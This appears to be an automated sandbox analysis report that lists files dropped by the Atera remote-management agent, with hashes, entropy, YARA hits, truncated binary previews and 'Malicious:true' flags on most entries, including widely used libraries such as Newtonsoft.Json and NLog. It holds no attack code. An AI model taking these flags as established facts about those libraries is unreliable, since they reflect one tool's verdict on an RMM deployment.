                                                                                                                                                                                                                                        SHA-512:2EFB2AAAD0ABD71D0B9B1426EA5597625E9E19BC26DE4E61866234B49420B028ACD7B59C31924027C7DFF8D61741BF8980F5CD8992FBDA389704AEB83F580612
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=$..........." ..0..B..........b`... ........... ..............................uM....`..................................`..O.......4............L..0(..........h_..8............................................ ............... ..H............text...h@... ...B.................. ..`.rsrc...4............D..............@..@.reloc...............J..............@..B................A`......H.......Lh................................................................(......}......}.......}.......}........o<...}....*..{....*>.{....o.......*v.{....o...........s....(...+*...0..<........{....o.....{....#.......@(....o.....{......o........&.....*........55........{....o.....{....#.......@(....o.....{......o....*..0..$........(......`...%..".o......{.....o....*Z.(....r...po ...o....*..{....o/...r...p.(....(....o%...*6..(....o....*..{....*..{....*.s....z.s....z.s....z.s..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.Exceptions.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16432
                                                                                                                                                                                                                                        Entropy (8bit):6.655495250287939
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:3Xh+/DtYchNyby2sE9jBF6IYiYF8pA5K+oCGUHFeFl5tPOO:3Xh+tYmNyb8E9VF6IYinAM+oCaFtB
                                                                                                                                                                                                                                        MD5:B82AE638F9E4EBD4AD8A8D7CFC2E45BD
                                                                                                                                                                                                                                        SHA1:046BFCDC1A5F858D0E0BADE9E3ED8B5B8AF8A927
                                                                                                                                                                                                                                        SHA-256:58CDD913338A3C34051CC0FA7AF6572D0D9CFD0D4F9A4F734FCD6C8969F399E2
                                                                                                                                                                                                                                        SHA-512:A80FD6B69B17F9B39363DA305FBBC691FBBD953F207CB82CE07D0B3339A22D9EE7A0802AE06590116F6ACB018B22B9D59C332D6DC646920196139B95FB7D2EE5
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T............." ..0.............v,... ...@....... ...................................@.................................",..O....@..(...............0(...`......H+..8............................................ ............... ..H............text...|.... ...................... ..`.rsrc...(....@......................@..@.reloc.......`......................@..B................V,......H........ ..d...........................................................&...(....*6.r...p.(....*..(....*..(....*"..(....*. ....*.r-..p*..(....*"..(....*. ....*.r...p*..(....*"..(....*. .*..*.r...p*. ....*.rN..p*..(....*.BSJB............v2.0.50727......l.......#~......<...#Strings....D...$...#US.h.......#GUID...x.......#Blob...........G..........3......................................................................f.....F...........n.................M...........2...........Z.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.ModelsV3.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):75312
                                                                                                                                                                                                                                        Entropy (8bit):6.240947600880177
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:Uu2lKxktXgl4icipJNz671/nVYWREDnAvk2jkbukZmyJsldySMcAn9fG1EcfgrYH:JF+qo7mDEwj4NXLGcfgruFcg7HxRt
                                                                                                                                                                                                                                        MD5:2E85C9C702122F118D03BE28BFD91ED0
                                                                                                                                                                                                                                        SHA1:35F355E20D39BFBA905DCEB715F489C73BD9D064
                                                                                                                                                                                                                                        SHA-256:038200D9D1D35476A036821B68A19A6A14B54C6B8100411C822104AA0CD18EFC
                                                                                                                                                                                                                                        SHA-512:2EA597952C14167A8137C6FEC1B430FFD998F80554889C0A650E81ED060D9BA7DB11AF12A9B12B1906E674DD40E80951114727DAD4E6C403FEFCCF43F9E293DE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.ModelsV3.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6............" ..0.............F.... ... ....... .......................`......).....`.....................................O.... ..................0(...@..........T............................................ ............... ..H............text...L.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................%.......H.......t<..`.............................................................{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*...0...........(.....(.....o....(....*.0...........(.....(.....o....(...+*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..(..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.Utils.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):51760
                                                                                                                                                                                                                                        Entropy (8bit):6.407265385002729
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:4QMnMYnUFMSptE7C+t2RO3neZN8752vwzE8Kku6ZFMLcyMmEpYinAMxC+:49MYn1seLE8JFMLcyMH7HxV
                                                                                                                                                                                                                                        MD5:29AA74C6424D539F2811C45BF5E67832
                                                                                                                                                                                                                                        SHA1:4DE469CF2CE0684AC2B63EB496C3ECCDAE7C3195
                                                                                                                                                                                                                                        SHA-256:37042907493F5B5AF8B018B99A23237178361571C19077F08873C8549DC5FD3D
                                                                                                                                                                                                                                        SHA-512:1EC9315715BDD03D4117E535784BE142CC6BE601691F077CEC20DDD6AD024533DB2AE0AA4F33847A0BFC8586AD47CF8ACD4306995523563AB4E6828F156C8AD6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.............r.... ........... ....................................`.....................................O.......4...............0(..........4...T............................................ ............... ..H............text...x.... ...................... ..`.rsrc...4...........................@..@.reloc..............................@..B................R.......H.......XE...q...........................................................0..........(.....o.....s........s............io........,...o.......jo....s....&.o.....O.........io ...&..i.X.O..........i(!.....i(".......(!....(#...*.........*.......0.._........($....s.......(%........i.Yo.....O......jo......s&.......io ...&(........io'.......,..o......*.........FS........((...*2.~....(....*....0...........()...,.r...ps*...z.()...,.r...ps*...z.....~....s+....s,.......o-....[o....o/...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\CommunityToolkit.WinUI.Notifications.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):145456
                                                                                                                                                                                                                                        Entropy (8bit):6.204131127257046
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:LRdbKQx0YYK8gwbUEA5xZs0vVV2yzlhXhYThkyFqhtuElLVwkVJe5K+Q7P6IlIhX:l9XeDmzV2yzlhKLFU1lLVp1+2flYFs6
                                                                                                                                                                                                                                        MD5:4DAAB78C30A10F505C9A704751A59371
                                                                                                                                                                                                                                        SHA1:C93E916B5002140D9082CC8993F893686CAB36F9
                                                                                                                                                                                                                                        SHA-256:811282D4430253D8A119235E5135330972A619C34F5D36248384237314874F7F
                                                                                                                                                                                                                                        SHA-512:6877156072D203AD70D87EC6E782925EB52DDE66F63E814C8928EB5CA7F89BF1823B9801689FBD087E769161F6DBDDEB228ACA13DFE962380A068A24B8291838
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....nI..........." ..0.............v$... ...@....... ...............................8....`.................................#$..O....@..|...............0(...`......,#..T............................................ ............... ..H............text...|.... ...................... ..`.rsrc...|....@......................@..@.reloc.......`......................@..B................W$......H.............................."......................................V!.b.....s&........*..{....*"..}....*..0..Z........(....o'...-.r...ps(...zs......(....o)....+..o*.....o.....o0...o+....o....-....,..o......*........*.$N......J.s,...}.....(-...*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*6.|.....(D...*..{....*"..}....*..{....*"..}....*V.(....-.r...p*.(....*..(E...%.(....o"...%.(....o$...%.(....o ...%.o....*..(-...*..{....*"..}....*..{ ...*"..} ...*..{!...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Interop.WUApiLib.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):96304
                                                                                                                                                                                                                                        Entropy (8bit):5.633803507709086
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:Z2kKfq2RQuKDMOoytxL2L4zP+YuqL2zL7SAaDx4lbOw6OhL7HxxJq:6QmyxL2L4D+YZL2X7SAaqywjhLNq
                                                                                                                                                                                                                                        MD5:7FA05737B29342299768084E0AB0A5EA
                                                                                                                                                                                                                                        SHA1:19B8F749A56930EF22F3C22350518B2468483008
                                                                                                                                                                                                                                        SHA-256:3E5D9B14E5F4EA7BDA79788E8ED905EBA862A00E28F6A3F7BD368DFCB2FD251E
                                                                                                                                                                                                                                        SHA-512:33BA94337FF042AF48AE68A5126D92DC6BBE3A52B58DBFE6DD72BC79ADD9B0761847081C1BA64874940E0285BC748109022A56034966419649846956750F1788
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....W...........!..... ... .......7... ...@....@.. ....................................@.................................47..W....@..p............P..0(...`....................................................... ............... ..H............text........ ... .................. ..`.rsrc...p....@.......0..............@..@.reloc.......`.......@..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.ApplicationInsights.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):386608
                                                                                                                                                                                                                                        Entropy (8bit):6.136214574059088
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:ZsETsbZnV4Nsaw8MkaybNq0qJh1rDHq4so8maLvdGCBg/8Q/ZmvEBv:ZsbZnMfwWFKFrrWa8BvEBv
                                                                                                                                                                                                                                        MD5:2EC7029F0ADADBFC8DA4927926418690
                                                                                                                                                                                                                                        SHA1:54912DDDF7E2445C0B82FE7BD51FE2F178AB0061
                                                                                                                                                                                                                                        SHA-256:2909E9398D2E5C0876D6E2CC431B197431E200AAB0E53966816A6D08E95D95F4
                                                                                                                                                                                                                                        SHA-512:E2852923E35EAE2B9EF60342E84323DB8B36F9BDE9B889401A6DCD02AD4171DE586CE581725C2F839DE67BD2A792C62679E5D1388388098ABAF396057EA3941A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ........... ....................... ............`.....................................O.......@...............0(..............8............................................ ............... ..H............text...0.... ...................... ..`.rsrc...@...........................@..@.reloc..............................@..B........................H.......T...$...................x.........................................{0...*..{1...*..{2...*..{3...*..(4.....}0.....}1.....}2......}3...*....0..q........u........d.,_(5....{0....{0...o6...,G(7....{1....{1...o8...,/(9....{2....{2...o:...,.(;....{3....{3...o<...*.*.*....0..b....... ...u )UU.Z(5....{0...o=...X )UU.Z(7....{1...o>...X )UU.Z(9....{2...o?...X )UU.Z(;....{3...o@...X*...0...........r...p......%..{0......%q.........-.&.+.......oA....%..{1......%q.........-.&.+.....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.Win32.Primitives.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.837755756588104
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:EN9VWhX3WZNyb8E9VF6IYinAM+oCF5Wc2E:IG8EpYinAMxCUE
                                                                                                                                                                                                                                        MD5:04750BC604E20F110D843AE24E4AEF65
                                                                                                                                                                                                                                        SHA1:A051E9CCFEBDA8B5A0C226B3C7255EC185784FCD
                                                                                                                                                                                                                                        SHA-256:3AFA7E8EED6BDB1E63F8326C452F4E43A5CDA7111A4F7B7AF0B42337F424ECC0
                                                                                                                                                                                                                                        SHA-512:1F4C2F19B4377A491044ED3CDEF9B1E4654AC6693939190DB5C0CA21CAAD75946ED08037C49D8AE718B58493D54C7BAA5E5610FF99742480C196459F24CD8B4D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..Y.........." ..0..............(... ...@....... ....................................@.................................T(..O....@..0...............0(...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc...0....@......................@..@.reloc.......`......................@..B.................(......H.......P ..L....................&......................................BSJB............v4.0.30319......l...|...#~......<...#Strings....$.......#US.(.......#GUID...8.......#Blob......................3......................................................\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.7...K.W...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.Win32.TaskScheduler.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):331824
                                                                                                                                                                                                                                        Entropy (8bit):6.168979309305954
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:7BhhiUWKJzPZNRntAXIjxs2f5Jg53XWlvidurmdIq8KmefViYkJTVBXi3VaKtNT+:7DMUWITZznu85k8Wdn8KmCjIFi3VvBQ
                                                                                                                                                                                                                                        MD5:B5848BDD7903F822083437F0384D9EB7
                                                                                                                                                                                                                                        SHA1:86CE9BB71AF96E66524965855ADA8331B52D60A9
                                                                                                                                                                                                                                        SHA-256:7AFA594AD2F7AC9DDAF02C47BA936F7DBDA8DB1923735C92EB9E7E19609CCDB5
                                                                                                                                                                                                                                        SHA-512:421911875A3A68CCACFA95BA79C4340E37C9472708129AED34154DEE1F6F12A20C126338DF8A193BF111D87ECAC7BF84861AF9EA9A1634D72D3238AF97155011
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ........... .......................@............@.....................................O.......................0(... ..........T............................................ ............... ..H............text...<.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H............9..............H.............................................{....*..{....*V.(......}......}....*...0..A........u3.......4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. ..<. )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q6....6...-.&.+...6...o.....%..{.......%q7....7...-.&.+...7...o.....(....*..{....*..{....*..{....*r.(......}......}......}....*..0..Y........u8.......L.,G(.....{.....{....o....,/(.....{.....{....o....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\NLog.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):883760
                                                                                                                                                                                                                                        Entropy (8bit):6.071439575841782
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:n1n1p9LdRN39aQLU0NnWSo7NReIGeFTiQaMcK2VJNUR10+xMhCJqtgsxUsQE:n1n1p9LdRN39aQZUqp
                                                                                                                                                                                                                                        MD5:6556368F22C5C2E1085095EECDF4940E
                                                                                                                                                                                                                                        SHA1:82DCC49EF9E6B03E0A4AC024A295A5A38DDB1D3B
                                                                                                                                                                                                                                        SHA-256:53DFD8F0A97BF937DD30B2D7D6164EF3A721F41E22EA1BAD22E16C1E7E3596BA
                                                                                                                                                                                                                                        SHA-512:C801C71D965452CA41064CF144F78D85EADC85DDD36272C562E3469AFBE8B2CEF6B8D01943BA0DFAB5673B8200A9AF96FA8615C9871B1AFF732ACF3B35B3FCCE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..F..........:d... ........... ....................................`..................................c..O....................T..0(.......... c..T............................................ ............... ..H............text....D... ...F.................. ..`.rsrc................H..............@..@.reloc...............R..............@..B.................d......H........%...2...........W.......b......................................"..(....*..(....*"..(....*..(....*..(....*..(....*.(....*"..(....*...0..B.......~..........(b...~....,.~.....oc......+...(......od......,..(e....*........../7......"..(....*6.(.....(....*..0..........(.......of...&.*.(....og...*2(.....oc...*....0..?.......~..........(b...~....,.~.....oc...+...(.....oh...&...,..(e....*.........,4.......0..?.......~..........(b...~....,.~....oi......+...(....oj......,..(e..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710192
                                                                                                                                                                                                                                        Entropy (8bit):5.960395457422526
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:/BARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU2:/BA/ZTvQD0XY0AJBSjRlXP36RMGb
                                                                                                                                                                                                                                        MD5:A7FA2706173C5415C05366DAE20C1FB1
                                                                                                                                                                                                                                        SHA1:658158F655BCB3F948D0718AA307A88F96381806
                                                                                                                                                                                                                                        SHA-256:2A13C7FDF9A663B58CE0C1ACB1B55C38855A34CAAF73BD1C731120B47A1E6034
                                                                                                                                                                                                                                        SHA-512:3D686DB8769B701B44A4DD4EC2F0F721166E58F6BD7F146AA1A99C1DDD1866348B75F504F4B207C302ACD275164ED4005F83E09E8FD3964CADA8226BE087AC70
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... .......o....`.....................................O.......................0(.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Polly.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):285744
                                                                                                                                                                                                                                        Entropy (8bit):6.184676930404378
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:aZAWDkTmokB1QI3A5XeedC1OcQykFlE1WhOMiSdNrgClZ73HpsP+zg:aZU0BJwuOcrl1w7HX3HWZ
                                                                                                                                                                                                                                        MD5:46EF8EF7FB431420BEC02E59C413DE8C
                                                                                                                                                                                                                                        SHA1:857F649E1B68C2350DAB0050FB9A0FA10A33E04B
                                                                                                                                                                                                                                        SHA-256:CD47B89D0CBFF121B97FF209D27E9DD7A773EFF9065ADD1B03F4B37B96B5D227
                                                                                                                                                                                                                                        SHA-512:6906E7BB97BC12785391949C20E520A2650CFEE2458C0D9D68764FB218AE755EA516C45C2FB196C6AFD47CA31114AF78521D48D9B89AECC479C99F811E845BCF
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&............" ..0..*..........&H... ...`....... ...............................u....`..................................G..O....`..L............4..0(...........G..T............................................ ............... ..H............text...,(... ...*.................. ..`.rsrc...L....`.......,..............@..@.reloc...............2..............@..B.................H......H....... d..t....................F......................................^.{....,.(F...z..}.....*^.{....,.(F...z..}.....*"..(K...*"..(L...*...0..,.......s.......}............s9...sv....{.....(....*.0..-.......s.......}............s9....s.....{.....(....*....0..(.......s.......}............s9.....{.....(....*.0..'.......s.......}............s9...sv.....(....*B...s......(....*......(....*.0..'.......s.......}............s9...sv.....(....*F...s.......(....*....0..X.........(:...}

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminder.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25648
                                                                                                                                                                                                                                        Entropy (8bit):6.561943281594342
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:iAQk7qYbA6fXDpLk5LHAxOEaGxBtpNyb8E9VF6IYinAM+oCsUK:B1LOg3BttEpYinAMxC2
                                                                                                                                                                                                                                        MD5:89C125D5355500E47B9358CBD77941C6
                                                                                                                                                                                                                                        SHA1:5A837BD2526650EDDFBCF76C0701B2F41A49EFD3
                                                                                                                                                                                                                                        SHA-256:AA638A8CB50FD81852138073CEB8C6C9ED58187106878210443D7574DEA5AB14
                                                                                                                                                                                                                                        SHA-512:5A1D1C24BB946D6DCA339BA19D4925A431C801DCC4C90F19B50698DC0E1C1BC41CEE1233438C567B18681F5128D7A94204E520C7FD4FC7A0536575B0029FA072
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminder.exe, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..............."...0..2...........Q... ...`....@.. ...............................K....`..................................Q..O....`...............<..0(...........P..8............................................ ............... ..H............text....1... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............:..............@..B.................Q......H........*.. &...........................................................0..:.......~....s....(.....(.~....r...p.o....r...p.o....(....o......*.............(......(....*.s.........*.0...........(.....(....o....r...p(....}......}.....s....}......{....s....}......{....s....}......{....s....}.....s....}.....(...+.~....%-.&~..........s....%............s....(.....{....s ...}......{....s!...}......{.....{....s....}....*.0...........(....,..(....*.{.... ....rU..pr...p.o"...u(.....(#.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminder.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2029
                                                                                                                                                                                                                                        Entropy (8bit):4.997010915207503
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:3Aruz7h+1/gF27RgdSagFsg+w3jdgDSg+CagFt:wruv4Mw9y
                                                                                                                                                                                                                                        MD5:A1DB8C019769BA7256F40E580304C782
                                                                                                                                                                                                                                        SHA1:6C0D70EE9CEBFC288A88B100F59D5554F8C42A35
                                                                                                                                                                                                                                        SHA-256:FC68DEF71CD783C53B3D106317F879E544E3443A55AF195BDD6C663F8051A96F
                                                                                                                                                                                                                                        SHA-512:795C141D06E70CD0D91ACFFE74F519EDB78382588B10927D456D20AA70D10BADCF02A626B8B666B00B21CAFCD555F03029D16EFAABCF1D762D58AA8095B6527D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup> .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.22.0.997" newVersion="2.22.0.997" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependent

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminderNotification.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):210992
                                                                                                                                                                                                                                        Entropy (8bit):5.3486126875762565
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:rsMNkrE4AOS3ncIzkq2ijc3Y28MNwH5Z5486:wMNkrE4AOqcIzQijLQ
